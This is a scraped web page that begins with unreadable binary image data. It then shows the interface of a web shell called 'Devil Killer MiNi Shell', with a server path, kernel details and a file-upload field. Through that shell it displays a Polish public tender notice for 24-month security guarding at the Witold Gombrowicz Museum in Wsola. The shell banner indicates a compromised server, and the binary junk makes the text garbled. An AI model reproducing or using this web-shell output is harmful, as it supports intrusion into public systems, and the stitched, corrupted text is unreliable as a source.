JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241125/0061449901-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie całodobowej usługi ochrony fizycznej i monitoringu osób i mienia w Muzeum Witolda Gombrowicza we Wsoli k/ Radomia przez okres 24 miesięcy: od 31.12.2022 do 31.12.2024 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Muzeum Literatury im. Adama Mickiewicza</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 016294058</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek Starego Miasta 20</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-272</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@muzeumliteratury.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.muzeumliteratury.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie całodobowej usługi ochrony fizycznej i monitoringu osób i mienia w Muzeum Witolda Gombrowicza we Wsoli k/ Radomia przez okres 24 miesięcy: od 31.12.2022 do 31.12.2024 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-76a3d3a5-b7a3-4972-a537-489bc2003dd6</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00614499</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00243058/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Świadczenie usługi ochrony osób i mienia obiektów Muzeum Witolda Gombrowicza we Wsoli, przez okres 24 miesięcy: od 31 grudnia 2024 do 31 grudnia 2026</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-76a3d3a5-b7a3-4972-a537-489bc2003dd6 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu<br/>Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl<br/>2. Komunikacja w postępowaniu, z wyłączeniem składania ofert w postępowaniu, odbywa się drogą elektroniczną za pośrednictwem<br/>formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do<br/>komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi.<br/>Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”).<br/>3. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację Wykonawcy i Zamawiającego za pośrednictwem<br/>Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail:<br/>zamowienia@muzeumliteratury.pl (nie dotyczy składania ofert)</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Możliwość korzystania w<br/>postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-<br/>Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania<br/>z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia (dotyczy w szczególności<br/>SWZ) wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>2. Wszystkie wysłane i odebrane w postępowaniu przez Wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie<br/>postępowania w zakładce „Komunikacja”.<br/>3. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>4. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>5. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą<br/>skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32) 77-88-999 lub drogą elektroniczną poprzez formularz<br/>udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>6. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację Wykonawcy i Zamawiającego za pośrednictwem<br/>Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail:<br/>zamowienia@muzeumliteratury.pl (nie dotyczy składania ofert).<br/>7. Komunikacja w niniejszym postępowaniu, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub<br/>oświadczeń między Zamawiającym a Wykonawcą, odbywa się przy użyciu środków komunikacji elektronicznej.<br/>8. W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla<br/>dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, mogą być opatrzone, zgodnie z wyborem<br/>Wykonawcy/Wykonawców wspólnie ubiegających się o udzielenie zamówienia/Podmiotu udostępniającego zasoby, podpisem<br/>zewnętrznym lub wewnętrznym. W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się do przesyłanej<br/>wiadomości uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym<br/>podpisem (typ wewnętrzny). W przypadku przekazywania w postępowaniu dokumentu elektronicznego w formacie poddającym dane<br/>kompresji, opatrzenie pliku zawierającego skompresowane dokumenty kwalifikowanym podpisem elektronicznym, jest równoznaczne<br/>z opatrzeniem wszystkich dokumentów zawartych w tym pliku kwalifikowanym podpisem elektronicznym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i ust. 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 roku w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w<br/>sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych)<br/>(dalej: RODO) informujemy:<br/>Administratorem Państwa danych osobowych jest Muzeum Literatury imienia Adama Mickiewicza w Warszawie z siedzibą przy ul.<br/>Rynek Starego Miasta 20 (00-272) Warszawa<br/>Inspektor Ochrony Danych<br/>Administrator wyznaczył Inspektora Ochrony Danych, z którym mogą się Państwo skontaktować poprzez e-maila:<br/>iod@muzeumliteratury.pl<br/>Dane osobowe przetwarzane w celu i na podstawie:<br/>▪ art. 6 ust 1 lit. c RODO - wypełnienia obowiązku prawnego ciążącego na administratorze w związku z Ustawą z dnia 11 września<br/>2019 r. Prawo zamówień publicznych (Dz.U. 2023.1605 z póżn.zm.) (PZP) w celu prowadzenia postępowania o udzielenie<br/>zamówienia publicznego oraz jego rozstrzygnięcia;<br/>▪ art. 6 ust 1 lit. b RODO - przetwarzanie jest niezbędne do wykonania umowy, której stroną jest podmiot realizujący zamówienia<br/>publiczne, lub do podjęcia działań na żądanie osoby, której dane dotyczą, przed zawarciem umowy.<br/>Zgodnie z RODO, przysługuje Państwu:<br/>▪ na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących;<br/>▪ na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia danych osobowych, przy czym skorzystanie z prawa do<br/>sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w sprawie<br/>zamówienia publicznego w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu postępowania oraz<br/>jego załączników;<br/>▪ na podstawie art. 18 RODO prawo żądania od Administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w<br/>odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby<br/>fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego, a także nie<br/>ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia;<br/>Nie przysługuje Państwu:<br/>▪ w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>▪ prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>▪ na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający oświadcza, że Wykonawcy nie przysługuje:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o których mowa w art. 20 RODO;<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/3/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ul. Gombrowicza 1, 26-660 Jedlińsk, polegającej na:<br/>1) ochronie stacjonarnej (stałej, bezpośredniej, świadczonej 24 h/dobę przez 7 dni w tygodniu, pracującej w systemie<br/>maksymalnie 24 godzinnym),<br/>2) monitorowaniu (stałym dozorze sygnałów przesyłanych, gromadzonych i przetwarzanych w elektronicznych urządzeniach<br/>i systemach alarmowych),<br/>3) ochronie doraźnej w postaci grupy interwencyjnej (czas dojazdu maksimum do 15 minut w godz. 6:00 – 22:00 oraz 10<br/>minut w godz. 22:00 – 6:00) - przez okres 24 miesięcy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-12-31 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującym kryterium:<br/>Cena oferty brutto – waga 100 pkt<br/>2. Cenę oferty brutto stanowi łączna wartość wynagrodzenia za usługi wykonywane w obiekcie Zamawiającego - za cały okres<br/>świadczenia usługi (24 miesiące) – waga 100 pkt (max 100 pkt).<br/>3. Oferta z najniższą ceną oferty brutto otrzyma maksymalną ilość punktów – 100 pkt. Pozostali Wykonawcy otrzymają odpowiednio<br/>mniej, zgodnie ze wzorem::<br/>C = (Cmin / Coferta) x 100 pkt., gdzie<br/>Cmin - oznacza najniższą cenę brutto zaoferowaną w postępowaniu<br/>Coferta - oznacza cenę brutto badanej oferty<br/>4. Punkty wg podanego wzoru zostaną wyliczone z dokładnością do dwóch miejsc po przecinku.<br/>5. Oferta, która otrzyma najwyższą ilość punktów zostanie uznana za najkorzystniejszą.<br/>6. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty.<br/>7. Niedopuszczalne jest prowadzenie negocjacji między Zamawiającym, a Wykonawcą, dotyczących złożonej oferty oraz<br/>dokonywanie jakichkolwiek zmian w treści złożonej oferty z zastrzeżeniem art. 223 ust. 2 ustawy Pzp.<br/>8. Zamawiający w tekście oferty poprawi omyłki określone w art. 223 ust. 2 ustawy Pzp., niezwłocznie powiadamiając o tym<br/>Wykonawcę, którego oferta została poprawiona.<br/>9. Zamawiający wybierze ofertę najkorzystniejszą spośród ofert nieodrzuconych, wyłącznie na podstawie kryterium oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1. Nie podlegają wykluczaniu na podstawie:<br/>1) art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4, 5, 7 ustawy Pzp.;<br/>2) art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu<br/>agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (tj. Dz. U. z dnia 13 kwietnia 2022 r. poz. 835);<br/>˗ Wykluczeniu na podstawie jw. nie może podlegać także podmiot na zdolnościach których polega Wykonawca.<br/>2. Spełniają warunki udziału w postępowaniu na podstawie art. 112 ust. 2 ustawy Pzp. dotyczące:<br/>1) Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów –<br/>Wykonawca spełni warunek, jeżeli wykaże, że posiada aktualną koncesję Ministerstwa Spraw Wewnętrznych i Administracji<br/>na prowadzenie działalności gospodarczej w zakresie ochrony osób i mienia wydanej na podstawie ustawy z dnia 22<br/>sierpnia 1997 r. o ochronie osób i mienia (t.j. Dz. U. z 2021 r. poz. 1995);<br/>2) Sytuacji ekonomicznej lub finansowej – Wykonawca spełni warunek jeśli wykaże, że jest ubezpieczony od<br/>odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie<br/>mniejszą niż 1.000.000 zł (słownie: jeden milion złotych brutto);<br/>3) Zdolności technicznej lub zawodowej – Wykonawca spełni warunek, jeżeli wykaże, że:<br/>a) wykonał należycie, w tym także w ramach wykonywanych świadczeń powtarzających się lub ciągłych, co najmniej dwie<br/>usługi (tzn. dwa oddzielne kontrakty/umowy) całodobowej bezpośredniej ochrony fizycznej osób i mienia w instytucjach publicznych (rządowych lub samorządowych) o następującym minimalnym łącznym zakresie dla każdej z usług:<br/>➢ wartości co najmniej 120.000 zł brutto, słownie: sto dwadzieścia tysięcy złotych brutto (do przeliczenia na PLN wartości<br/>wskazanej w dokumentach złożonych na potwierdzenie spełniania warunków udziału, wyrażonej w walutach innych niż PLN,<br/>Zamawiający<br/>przyjmie średni kurs publikowany przez Narodowy Bank Polski dla tej waluty z dnia publikacji ogłoszenia o niniejszym<br/>zamówieniu),<br/>➢ trwającą nieprzerwanie przez okres co najmniej 12 miesięcy,<br/>➢ zrealizowanej (zakończonej lub nadal realizowanej od co najmniej 12 miesięcy przed datą złożenia oferty) w okresie<br/>ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie;<br/>b) dysponuje zespołem zdolnym do wykonania zamówienia tj. wykaże co najmniej pięciu pracowników ochrony, którzy: 1) są<br/>wpisani na listę kwalifikowanych pracowników ochrony fizycznej i posiadają aktualne badania lekarskie i psychologiczne -<br/>zgodnie z art. 26 ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia, 2) odznaczają się wysoką kulturą osobistą i<br/>stosownymi umiejętnościami w zakresie komunikacji interpersonalnej w związku z miejscem świadczenia usługi ochrony<br/>(muzeum), 3) posiadających minimum 3-miesięczne doświadczenie w obsłudze systemu przeciwpożarowego, włamania i<br/>napadu oraz telewizji dozorowej oraz są przeszkoleni w procedurach postępowania w nagłych przypadkach – i którzy będą<br/>uczestniczyć w wykonywaniu zamówienia;<br/>c) dysponuje kwalifikowanym pracownikiem ochrony, który będzie pełnił funkcję Koordynatora Ochrony (KO) w Muzeum<br/>Witolda Gombrowicza;<br/>d) dysponuje co najmniej jedną Grupą interwencyjną (GI), opisaną w Załączniku Nr 1 do SWZ oraz zgodnie z<br/>Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 21 października 2011 r. w sprawie zasad uzbrojenia<br/>specjalistycznych uzbrojonych formacji ochronnych i warunków przechowywania oraz ewidencjonowania broni i amunicji (t.j.<br/>Dz. U. 2015 poz. 992). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)<br/>Aktualna koncesja na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia wydana przez Ministra Spraw<br/>Wewnętrznych i Administracji zgodnie z ustawą z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (t.j. Dz. U. z 2021 r. poz. 1995).<br/>2) Wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich<br/>3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i<br/>podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, wraz z załączeniem dowodów określających, czy te<br/>usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są<br/>wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie<br/>wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty<br/>potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/>3) Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia, w szczególności odpowiedzialnych za świadczenie usług<br/>wraz z informacjami na temat ich kwalifikacji zawodowych i uprawnień oraz informacją o podstawie do dysponowania tymi osobami,<br/>potwierdzający spełnianie warunków udziału w postępowaniu wg wzoru stanowiącego Załącznik Nr 9 do SWZ<br/>4) Oświadczenie Wykonawcy, że dysponuje 